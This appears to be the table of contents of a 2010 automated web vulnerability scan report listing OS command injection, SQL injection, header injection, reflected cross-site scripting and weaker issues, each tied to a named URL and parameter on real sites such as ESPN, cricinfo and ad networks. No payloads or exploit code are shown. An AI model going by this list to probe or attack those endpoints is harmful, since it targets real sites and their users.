Report generated by Hoyt LLC Research at Sun Nov 07 01:10:36 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

Loading

1. OS command injection

1.1. http://www.microsoft.com/downloads/details.aspx [REST URL parameter 1]

1.2. http://www.microsoft.com/downloads/details.aspx [REST URL parameter 2]

2. SQL injection

2.1. http://deepquest.code511.com/blog/2010/11/06/exploit-next-generation-sql-fingerprint-esf-??-ms-sql-server-fingerprinting-tool/ [REST URL parameter 1]

2.2. http://deepquest.code511.com/blog/2010/11/06/exploit-next-generation-sql-fingerprint-esf-??-ms-sql-server-fingerprinting-tool/ [REST URL parameter 5]

2.3. http://espn.go.com/espn/fp/pollDataGenUniversal [name of an arbitrarily supplied request parameter]

2.4. http://topsy.com/link [name of an arbitrarily supplied request parameter]

2.5. http://topsy.com/top [REST URL parameter 1]

2.6. http://topsy.com/top [Referer HTTP header]

2.7. http://w88.go.com/b/ss/wdgesp360,wdgespge/1/H.21/s24528802135027 [REST URL parameter 1]

2.8. http://w88.go.com/b/ss/wdgespcom,wdgespge/1/H.21/s2139151592738 [REST URL parameter 5]

2.9. http://w88.go.com/b/ss/wdgespcom,wdgespge/1/H.21/s27365652576554 [REST URL parameter 6]

2.10. http://w88.go.com/b/ss/wdgespcom,wdgespge/1/H.21/s28015880165621 [REST URL parameter 5]

2.11. http://w88.go.com/b/ss/wdgespcom,wdgespge/1/H.21/s28144118890631 [REST URL parameter 3]

2.12. http://w88.go.com/b/ss/wdgespcom,wdgespge/1/H.21/s29519969122484 [REST URL parameter 2]

2.13. http://w88.go.com/b/ss/wdgespcom,wdgespge/1/H.21/s29801530453842 [REST URL parameter 6]

2.14. http://w88.go.com/b/ss/wdgespfantasy,wdgespge/1/H.21/s21731494003906 [REST URL parameter 1]

3. LDAP injection

4. HTTP header injection

4.1. http://ad.vulnerable.ad.partner/ad/N2465.SD153321N2465SN0/B4809700.16 [REST URL parameter 1]

4.2. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.12 [REST URL parameter 1]

4.3. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.13 [REST URL parameter 1]

4.4. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.15 [REST URL parameter 1]

4.5. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.16 [REST URL parameter 1]

4.6. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.17 [REST URL parameter 1]

4.7. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.61 [REST URL parameter 1]

4.8. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.62 [REST URL parameter 1]

4.9. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.63 [REST URL parameter 1]

4.10. http://ad.vulnerable.ad.partner/ad/N3340.espn.com/B4282150.59 [REST URL parameter 1]

4.11. http://ad.vulnerable.ad.partner/ad/N4694.Beep01/B4850508.10 [REST URL parameter 1]

4.12. http://ad.vulnerable.ad.partner/ad/N5364.vibrantmedia.com/B4832252.3 [REST URL parameter 1]

4.13. http://ad.vulnerable.ad.partner/ad/N5865.149077.ESPN/B4748231.11 [REST URL parameter 1]

4.14. http://ad.vulnerable.ad.partner/ad/allb.tbd/front [REST URL parameter 1]

4.15. http://ad.vulnerable.ad.partner/ad/x1.cont/espn/360/soccer [REST URL parameter 1]

4.16. http://ad.vulnerable.ad.partner/adi/N2724.ESPNBass/B4661944.101 [REST URL parameter 1]

4.17. http://ad.vulnerable.ad.partner/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114 [REST URL parameter 1]

4.18. http://ad.vulnerable.ad.partner/adi/N3220.ESPN/B4924969.15 [REST URL parameter 1]

4.19. http://ad.vulnerable.ad.partner/adi/N3740.132309.BURSTMEDIA/B4366794.6 [REST URL parameter 1]

4.20. http://ad.vulnerable.ad.partner/adi/N4492.espn.com/B4156424 [REST URL parameter 1]

4.21. http://ad.vulnerable.ad.partner/adi/N6357.2489.ESPN.COM/B4629693.10 [REST URL parameter 1]

4.22. http://ad.vulnerable.ad.partner/adi/N763.134426.GOOGLEDISPLAYNETWORK/B4893505.38 [REST URL parameter 1]

4.23. http://ad.vulnerable.ad.partner/adj/N3220.ESPN/B4924969.11 [REST URL parameter 1]

4.24. http://ad.vulnerable.ad.partner/adj/N3340.espn.com/B4282150.59 [REST URL parameter 1]

4.25. http://ad.vulnerable.ad.partner/adj/N3740.132309.BURSTMEDIA/B4366794.6 [REST URL parameter 1]

4.26. http://ad.vulnerable.ad.partner/adj/N6357.2489.ESPN.COM/B4629693.10 [REST URL parameter 1]

4.27. http://ad.vulnerable.ad.partner/adj/N763.134426.GOOGLEDISPLAYNETWORK/B4893505.38 [REST URL parameter 1]

4.28. http://ad.vulnerable.ad.partner/adj/x1.cont/espn/360/soccer [REST URL parameter 1]

4.29. http://ad.vulnerable.ad.partner/jump/N4694.Beep01/B4850508.10 [REST URL parameter 1]

4.30. http://ad.vulnerable.ad.partner/jump/allb.tbd/front [REST URL parameter 1]

4.31. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c [REST URL parameter 4]

4.32. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

4.33. http://games.espn.go.com/pokerpickem/en/frontpage [REST URL parameter 2]

4.34. http://games.espn.go.com/pokerpickem/en/group [REST URL parameter 2]

4.35. http://games.espn.go.com/pokerpickem/en/story [REST URL parameter 2]

4.36. http://streak.espn.go.com/createOrUpdateEntry [REST URL parameter 1]

4.37. http://streak.espn.go.com/en/ [REST URL parameter 1]

4.38. http://streak.espn.go.com/en/conversation [REST URL parameter 1]

4.39. http://streak.espn.go.com/en/createOrUpdateEntry [REST URL parameter 1]

4.40. http://streak.espn.go.com/en/entry [REST URL parameter 1]

4.41. http://streak.espn.go.com/en/entryStats [REST URL parameter 1]

4.42. http://streak.espn.go.com/en/story [REST URL parameter 1]

4.43. http://submit.cricinfo.com/ci/content/submit/comment/redirect.html [object_id parameter]

5. Cross-site scripting (reflected)

5.1. http://altfarm.mediaplex.com/ad/fm/12760-79049-1577-0 [name of an arbitrarily supplied request parameter]

5.2. http://digg.com/submit [REST URL parameter 1]

5.3. http://dm.de.mookie1.com/2/B3DM/2010DM/146837268@x23 [REST URL parameter 2]

5.4. http://dm.de.mookie1.com/2/B3DM/2010DM/146837268@x23 [REST URL parameter 3]

5.5. http://dm.de.mookie1.com/2/B3DM/2010DM/146837268@x23 [REST URL parameter 4]

5.6. http://dm.de.mookie1.com/2/B3DM/DLX/11053880328@x95 [REST URL parameter 2]

5.7. http://dm.de.mookie1.com/2/B3DM/DLX/11053880328@x95 [REST URL parameter 3]

5.8. http://dm.de.mookie1.com/2/B3DM/DLX/11053880328@x95 [REST URL parameter 4]

5.9. http://dm.de.mookie1.com/2/B3DM/DLX/11053880328@x95 [name of an arbitrarily supplied request parameter]

5.10. http://dm.de.mookie1.com/2/B3DM/DLX/11611717638@x92 [REST URL parameter 2]

5.11. http://dm.de.mookie1.com/2/B3DM/DLX/11611717638@x92 [REST URL parameter 3]

5.12. http://dm.de.mookie1.com/2/B3DM/DLX/11611717638@x92 [REST URL parameter 4]

5.13. http://espn.go.com/broadband/mpf/players/genericIndexPlayerPage [adminOver parameter]

5.14. http://espn.go.com/broadband/mpf/players/genericIndexPlayerPage [autostart parameter]

5.15. http://espn.go.com/broadband/mpf/players/genericIndexPlayerPage [player parameter]

5.16. http://espn.go.com/espn3/index/_/sport/basketball [REST URL parameter 5]

5.17. http://espn.go.com/espn3/index/_/sport/basketball [REST URL parameter 5]

5.18. http://espn.go.com/sports/scores/window [pageType parameter]

5.19. http://espn.go.com/videohub/mpf/config.prodXml [adminOver parameter]

5.20. http://espn.go.com/videohub/mpf/frame/playerEmbed [height parameter]

5.21. http://espn.go.com/videohub/mpf/frame/playerEmbed [height parameter]

5.22. http://espn.go.com/videohub/mpf/frame/playerEmbed [id parameter]

5.23. http://espn.go.com/videohub/mpf/frame/playerEmbed [id parameter]

5.24. http://espn.go.com/videohub/mpf/frame/playerEmbed [id parameter]

5.25. http://espn.go.com/videohub/mpf/frame/playerEmbed [omniPageName parameter]

5.26. http://espn.go.com/videohub/mpf/frame/playerEmbed [player parameter]

5.27. http://espn.go.com/videohub/mpf/frame/playerEmbed [player parameter]

5.28. http://espn.go.com/videohub/mpf/frame/playerEmbed [width parameter]

5.29. http://g.espncdn.com/mpcommons/static/css/main [REST URL parameter 2]

5.30. http://g.espncdn.com/mpcommons/static/css/main [REST URL parameter 3]

5.31. http://g.espncdn.com/mpcommons/static/css/main [REST URL parameter 4]

5.32. http://g.espncdn.com/mpcommons/static/js/main [REST URL parameter 2]

5.33. http://g.espncdn.com/mpcommons/static/js/main [REST URL parameter 3]

5.34. http://g.espncdn.com/mpcommons/static/js/main [REST URL parameter 4]

5.35. http://games.espn.go.com/frontpage [REST URL parameter 1]

5.36. http://games.espn.go.com/frontpage/basketball [REST URL parameter 1]

5.37. http://games.espn.go.com/frontpage/basketball [REST URL parameter 2]

5.38. http://games.espn.go.com/pokerpickem/en/frontpage [REST URL parameter 2]

5.39. http://games.espn.go.com/pokerpickem/en/frontpage [REST URL parameter 3]

5.40. http://games.espn.go.com/pokerpickem/en/group [REST URL parameter 2]

5.41. http://games.espn.go.com/pokerpickem/en/group [REST URL parameter 3]

5.42. http://games.espn.go.com/pokerpickem/en/story [REST URL parameter 2]

5.43. http://games.espn.go.com/pokerpickem/en/story [REST URL parameter 3]

5.44. http://insider.espn.go.com/insider/blog [REST URL parameter 2]

5.45. http://insider.espn.go.com/insider/index [REST URL parameter 2]

5.46. http://insider.espn.go.com/insider/news [REST URL parameter 2]

5.47. http://insider.espn.go.com/insider/rumorcentral [REST URL parameter 2]

5.48. http://insider.espn.go.com/insider/rumorcentral [name of an arbitrarily supplied request parameter]

5.49. http://insider.espn.go.com/insider/sportindex [REST URL parameter 2]

5.50. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

5.51. http://m.espn.go.com/soccer/ [REST URL parameter 1]

5.52. http://m.espn.go.com/wireless/ [REST URL parameter 1]

5.53. http://proxy.espn.go.com/outdoors/bassmaster/members/insider/resources/column [REST URL parameter 3]

5.54. http://proxy.espn.go.com/outdoors/bassmaster/members/insider/story [REST URL parameter 3]

5.55. http://sendtofriend.espn.go.com/sendtofriend/SendToFriend [REST URL parameter 1]

5.56. http://sendtofriend.espn.go.com/sendtofriend/espn [REST URL parameter 1]

5.57. http://soccernet.espn.go.com/world-cup/ [name of an arbitrarily supplied request parameter]

5.58. http://soccernet.espn.go.com/worldcup/ [name of an arbitrarily supplied request parameter]

5.59. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [REST URL parameter 6]

5.60. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [name of an arbitrarily supplied request parameter]

5.61. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [REST URL parameter 6]

5.62. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [name of an arbitrarily supplied request parameter]

5.63. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [REST URL parameter 6]

5.64. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [name of an arbitrarily supplied request parameter]

5.65. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [REST URL parameter 6]

5.66. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [name of an arbitrarily supplied request parameter]

5.67. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [REST URL parameter 6]

5.68. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [name of an arbitrarily supplied request parameter]

5.69. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [REST URL parameter 6]

5.70. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [name of an arbitrarily supplied request parameter]

5.71. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [REST URL parameter 6]

5.72. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [name of an arbitrarily supplied request parameter]

5.73. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [REST URL parameter 6]

5.74. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [name of an arbitrarily supplied request parameter]

5.75. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [REST URL parameter 6]

5.76. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [name of an arbitrarily supplied request parameter]

5.77. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [REST URL parameter 6]

5.78. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [name of an arbitrarily supplied request parameter]

5.79. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [REST URL parameter 6]

5.80. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [name of an arbitrarily supplied request parameter]

5.81. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [REST URL parameter 6]

5.82. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [name of an arbitrarily supplied request parameter]

5.83. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [REST URL parameter 6]

5.84. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [name of an arbitrarily supplied request parameter]

5.85. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [REST URL parameter 6]

5.86. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [name of an arbitrarily supplied request parameter]

5.87. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [REST URL parameter 6]

5.88. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [name of an arbitrarily supplied request parameter]

5.89. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [REST URL parameter 6]

5.90. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [name of an arbitrarily supplied request parameter]

5.91. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [REST URL parameter 6]

5.92. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [name of an arbitrarily supplied request parameter]

5.93. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [REST URL parameter 6]

5.94. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [name of an arbitrarily supplied request parameter]

5.95. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [REST URL parameter 6]

5.96. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [name of an arbitrarily supplied request parameter]

5.97. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [REST URL parameter 6]

5.98. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [name of an arbitrarily supplied request parameter]

5.99. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [REST URL parameter 6]

5.100. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [name of an arbitrarily supplied request parameter]

5.101. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [REST URL parameter 6]

5.102. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [name of an arbitrarily supplied request parameter]

5.103. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [REST URL parameter 6]

5.104. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [name of an arbitrarily supplied request parameter]

5.105. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [REST URL parameter 6]

5.106. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [name of an arbitrarily supplied request parameter]

5.107. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [REST URL parameter 6]

5.108. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [name of an arbitrarily supplied request parameter]

5.109. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [REST URL parameter 6]

5.110. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [name of an arbitrarily supplied request parameter]

5.111. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [REST URL parameter 6]

5.112. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [name of an arbitrarily supplied request parameter]

5.113. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [REST URL parameter 6]

5.114. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [name of an arbitrarily supplied request parameter]

5.115. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [REST URL parameter 6]

5.116. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [name of an arbitrarily supplied request parameter]

5.117. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [REST URL parameter 6]

5.118. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [name of an arbitrarily supplied request parameter]

5.119. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [REST URL parameter 6]

5.120. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [name of an arbitrarily supplied request parameter]

5.121. http://sports.espn.go.com/keyword/search [REST URL parameter 2]

5.122. http://static.ak.fbcdn.net/connect.php/js/FB.Share [REST URL parameter 3]

5.123. http://streak.espn.go.com/createOrUpdateEntry [REST URL parameter 1]

5.124. http://streak.espn.go.com/en/ [REST URL parameter 1]

5.125. http://streak.espn.go.com/en/conversation [REST URL parameter 1]

5.126. http://streak.espn.go.com/en/conversation [REST URL parameter 2]

5.127. http://streak.espn.go.com/en/createOrUpdateEntry [REST URL parameter 1]

5.128. http://streak.espn.go.com/en/createOrUpdateEntry [REST URL parameter 2]

5.129. http://streak.espn.go.com/en/entry [REST URL parameter 1]

5.130. http://streak.espn.go.com/en/entry [REST URL parameter 2]

5.131. http://streak.espn.go.com/en/entryStats [REST URL parameter 1]

5.132. http://streak.espn.go.com/en/entryStats [REST URL parameter 2]

5.133. http://streak.espn.go.com/en/story [REST URL parameter 1]

5.134. http://streak.espn.go.com/en/story [REST URL parameter 2]

5.135. http://submit.cricinfo.com/ci/content/submit/comment/redirect.html [object_id parameter]

5.136. http://submit.cricinfo.com/ci/content/submit/comment/usr_login.html [object_id parameter]

5.137. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [name of an arbitrarily supplied request parameter]

5.138. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [object_id parameter]

5.139. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/login_validate.html [callback parameter]

5.140. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [name of an arbitrarily supplied request parameter]

5.141. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [sc parameter]

5.142. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_screenname.html [remember parameter]

5.143. http://tredir.go.com/capmon/GetDE [REST URL parameter 1]

5.144. http://tredir.go.com/capmon/GetDE [REST URL parameter 2]

5.145. http://us.generation-nt.com/help/converting+mssql+mysql/ [REST URL parameter 2]

5.146. http://redcated/CNT/iview/262688115/direct [REST URL parameter 4]

5.147. http://redcated/DEN/iview/252677534/direct/078115 [REST URL parameter 4]

5.148. http://redcated/DEN/iview/254478378/direct [REST URL parameter 4]

5.149. http://redcated/ULA/iview/265979671/direct [REST URL parameter 4]

5.150. http://www.addthis.com/bookmark.php [REST URL parameter 1]

5.151. http://www.addthis.com/bookmark.php [REST URL parameter 1]

5.152. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

5.153. http://www.cricinfo.com/ [name of an arbitrarily supplied request parameter]

5.154. http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html [name of an arbitrarily supplied request parameter]

5.155. http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485685.html [name of an arbitrarily supplied request parameter]

5.156. http://www.cricinfo.com/pakistan-v-south-africa-2010/content/story/485578.html [name of an arbitrarily supplied request parameter]

5.157. http://www.insightbb.com/Auth/Authpartners.aspx [REST URL parameter 1]

5.158. http://www.insightbb.com/Auth/Authpartners.aspx [REST URL parameter 2]

5.159. http://submit.cricinfo.com/ci/content/submit/comment/redirect.html [Referer HTTP header]

5.160. http://submit.cricinfo.com/ci/content/submit/comment/usr_login.html [Referer HTTP header]

5.161. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [Referer HTTP header]

5.162. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [Referer HTTP header]

5.163. http://www.addthis.com/bookmark.php [Referer HTTP header]

5.164. http://www.addthis.com/bookmark.php [Referer HTTP header]

5.165. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [Q_cricinfo_cluster cookie]

5.166. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [Q_cricinfo_cluster cookie]

5.167. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [Q_cricinfo_cluster cookie]

5.168. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [Q_cricinfo_country cookie]

5.169. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [Q_cricinfo_country cookie]

5.170. http://submit.cricinfo.com/ci/content/submit/poll/cast_vote.html [Q_cricinfo_cluster cookie]

5.171. http://submit.cricinfo.com/ci/content/submit/poll/cast_vote.html [Q_cricinfo_cluster cookie]

5.172. http://submit.cricinfo.com/ci/content/submit/poll/cast_vote.html [Q_cricinfo_cluster cookie]

5.173. http://submit.cricinfo.com/ci/content/submit/poll/cast_vote.html [Q_cricinfo_country cookie]

5.174. http://submit.cricinfo.com/ci/content/submit/poll/cast_vote.html [Q_cricinfo_country cookie]

5.175. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [Q_cricinfo_cluster cookie]

5.176. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [Q_cricinfo_cluster cookie]

5.177. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [Q_cricinfo_cluster cookie]

5.178. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [Q_cricinfo_country cookie]

5.179. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [Q_cricinfo_country cookie]

5.180. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_screenname.html [Q_cricinfo_cluster cookie]

5.181. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_screenname.html [Q_cricinfo_country cookie]

5.182. http://tredir.go.com/capmon/GetDE [DE2 cookie]

6. Cleartext submission of password

6.1. http://www.cricinfo.com/ci/content/current/match/fixtures_futures.html

6.2. http://www.cricinfo.com/ci/content/current/story/news.html

6.3. http://www.cricinfo.com/ci/content/page/417881.html

6.4. http://www.cricinfo.com/ci/engine/current/match/scores/live.html

6.5. http://www.cricinfo.com/ci/engine/current/match/scores/recent.html

6.6. http://www.cricinfo.com/magazine/content/current/story/magazine/index.html

7. Session token in URL

8. Password field submitted using GET method

8.1. http://espn.go.com/espn3/index

8.2. http://espn.go.com/espn3/index/_/sport/basketball

8.3. http://espn.go.com/espn3/index/_/sport/football

8.4. http://espn.go.com/espn3/index/_/sport/index

9. Open redirection

9.1. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c [REST URL parameter 4]

9.2. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c [name of an arbitrarily supplied request parameter]

10. Cookie without HttpOnly flag set

10.1. http://www.cricshop.com/Replica-Cricket-Kit/2009%20England%20Replica%20Clothing.aspx

10.2. http://www.hsbcnri.co.in/lms0509/HSBCNACC17Aug09/lp.asp

10.3. http://www.icicibankm2i.com/lms_ct/m2iGLSCH/index.asp

10.4. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250

10.5. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=61x21

10.6. http://b.aol.com/vanity/

10.7. http://b.scorecardresearch.com/b

10.8. http://b.scorecardresearch.com/r

10.9. http://in.getclicky.com/in.php

10.10. http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s28736884680110

10.11. http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s2959826072212

10.12. http://sdc.icicibank.com/dcs0wc0p0100008qxh3a7m16r_4b2y/dcs.gif

10.13. http://sdc.icicibank.com/dcs0wc0p0100008qxh3a7m16r_4b2y/dcs.gif

10.14. http://www.aol.com/

10.15. http://www.googleadservices.com/pagead/aclk

10.16. http://www.lexus.com/lexus-share/css/lexus_3_5.css

10.17. http://www.lexus.com/lexus-share/js/lexus_3_5.js

10.18. http://www.yourlexusdealer.com/Houston/index.html

11. Password field with autocomplete enabled

11.1. http://espn.go.com/espn3/index

11.2. http://espn.go.com/espn3/index/_/sport/basketball

11.3. http://espn.go.com/espn3/index/_/sport/football

11.4. http://espn.go.com/espn3/index/_/sport/index

11.5. http://www.cricinfo.com/ci/content/current/match/fixtures_futures.html

11.6. http://www.cricinfo.com/ci/content/current/story/news.html

11.7. http://www.cricinfo.com/ci/content/page/417881.html

11.8. http://www.cricinfo.com/ci/engine/current/match/scores/live.html

11.9. http://www.cricinfo.com/ci/engine/current/match/scores/recent.html

11.10. http://www.cricinfo.com/magazine/content/current/story/magazine/index.html

12. Cookie scoped to parent domain

12.1. http://b.aol.com/vanity/

12.2. http://b.scorecardresearch.com/b

12.3. http://b.scorecardresearch.com/r

12.4. http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s28736884680110

12.5. http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s2959826072212

13. Cross-domain Referer leakage

13.1. http://ad.vulnerable.ad.partner/adj/espncricinfo_global/fixtures

13.2. http://ad.vulnerable.ad.partner/adj/espncricinfo_global/global

13.3. http://ad.vulnerable.ad.partner/adj/espncricinfo_global/global

13.4. http://ad.vulnerable.ad.partner/adj/espncricinfo_global/recentresults

13.5. http://ad.vulnerable.ad.partner/adj/espncricinfo_global/recentresults

13.6. http://ad.vulnerable.ad.partner/adj/espncricinfo_livescorecard/livescoreindex

13.7. http://ad.vulnerable.ad.partner/adj/espncricinfo_news/newsindex

13.8. http://ad.vulnerable.ad.partner/adj/espncricinfo_news/newsindex

13.9. http://ad.vulnerable.ad.partner/adj/espncricinfo_news/newsindex

13.10. http://ad.turn.com/server/ads.js

13.11. http://creativeby2.unicast.com/assets/A23/N1405/M9880/P5/Q54302/script_300_250.js

13.12. http://googleads.g.vulnerable.ad.partner/pagead/ads

13.13. http://googleads.g.vulnerable.ad.partner/pagead/ads

13.14. http://linkhelp.clients.google.com/tbproxy/lh/fixurl

13.15. http://www.aol.com/

13.16. http://www.aol.com/

13.17. http://www.dreamcricket.com/dreamcricket/fantasy/profile_new/tournament.aspx

13.18. http://www.facebook.com/plugins/like.php

13.19. http://www.icicibankm2i.com/lms_ct/m2iGLSCH/index.asp

13.20. http://www.yourlexusdealer.com/Houston/RX/index.html

13.21. http://www.yourlexusdealer.com/Houston/index.html

14. Cross-domain script include

14.1. http://espn.go.com/espn3/player

14.2. http://espn.go.com/espntv/espnTopics

14.3. http://espn.go.com/golf/leaderboard

14.4. http://espn.go.com/horse-racing/breederscup2010/index

14.5. http://espn.go.com/minorlbb/schedule

14.6. http://espn.go.com/minorlbb/scoreboard

14.7. http://espn.go.com/minorlbb/standings

14.8. http://espn.go.com/minorlbb/statistics

14.9. http://espn.go.com/minorlbb/teams

14.10. http://espn.go.com/nba/gamecast

14.11. http://espn.go.com/nba/schedule

14.12. http://www.aol.com/

14.13. http://www.aol.com/

14.14. http://www.cricinfo.com/ci/content/current/match/fixtures_futures.html

14.15. http://www.cricinfo.com/ci/content/current/story/news.html

14.16. http://www.cricinfo.com/ci/content/page/417881.html

14.17. http://www.cricinfo.com/ci/engine/current/match/scores/live.html

14.18. http://www.cricinfo.com/ci/engine/current/match/scores/recent.html

14.19. http://www.cricinfo.com/magazine/content/current/story/magazine/index.html

14.20. http://www.dreamcricket.com/dreamcricket/fantasy/profile_new/tournament.aspx

14.21. http://www.facebook.com/plugins/like.php

14.22. http://www.icicibankm2i.com/lms_ct/m2iGLSCH/index.asp

14.23. http://www.yourlexusdealer.com/Houston/RX/index.html

14.24. http://www.yourlexusdealer.com/Houston/index.html

15. TRACE method is enabled

15.1. http://au.track.decideinteractive.com/

15.2. http://creativeby2.unicast.com/

15.3. http://dev.jqueryui.com/

16. Email addresses disclosed

16.1. http://ads.gmodules.com/gadgets/makeRequest

16.2. http://espn.go.com/espn/e60/index

16.3. http://jqueryui.com/about

16.4. http://jqueryui.com/support

16.5. http://portal.aolcdn.com/p5/_v36.9/js/main.js

16.6. http://soccernet-assets.espn.go.com/design08/insertfiles/js/frontpage.js

16.7. http://static.jquery.com/ui/themeroller/scripts/app.js

16.8. http://whois.domaintools.com/composite/code.js

16.9. http://www.247realmedia.com/EN-US/contact/New_york.html

16.10. http://www.247realmedia.com/EN-US/contact/favicon.ico

16.11. http://www.247realmedia.com/EN-US/favicon.ico

16.12. http://www.cricinfo.com/navigation/cricinfo/omniture/omniture_global.js

16.13. http://www.filamentgroup.com/

16.14. http://www.filamentgroup.com/js/jquery.js,jquery.plugins.js,common.js,screen.js

16.15. http://www.google.com/

16.16. http://www.google.com/s

16.17. http://www.google.com/s

16.18. http://www.google.com/s

16.19. http://www.google.com/s

16.20. http://www.google.com/s

16.21. http://www.google.com/search

16.22. http://www.google.com/search

16.23. http://www.google.com/search

16.24. http://www.google.com/search

16.25. http://www.google.com/search

16.26. http://www.lexus.com/lexus-share/css/lexus_3_5.css

